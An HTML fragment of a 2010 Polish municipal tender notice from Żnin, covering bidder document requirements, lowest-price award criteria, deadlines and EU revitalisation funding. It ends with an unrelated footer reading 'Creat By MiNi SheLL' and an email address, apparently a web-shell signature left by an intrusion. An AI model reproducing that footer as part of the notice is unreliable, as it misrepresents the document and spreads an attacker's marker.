<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kosztorys ofertowy i harmonogram rzeczowo-finansowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku wystąpienia niesprzyjających warunków atmosferycznych, bądź nieprzewidzianych zdarzeń losowych i trudności w pozyskaniu materiałów, dopuszcza się możliwość aneksowania terminu zakończenia robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gmina.znin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Żninie, ul. 700-lecia 39  88-400 ŻNIN.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2010 godzina 11:00, miejsce: Urząd Miejski w Żninie  ul. 700-lecia 39  88-400 ŻNIN, pokój nr 26.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Działanie 7.1 Rewitalizacja zdegradowanych dzielnic miast, oś priorytetowa 7 Regionalnego Programu Rewitalizacji Woj. Kujawsko-Pomorskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com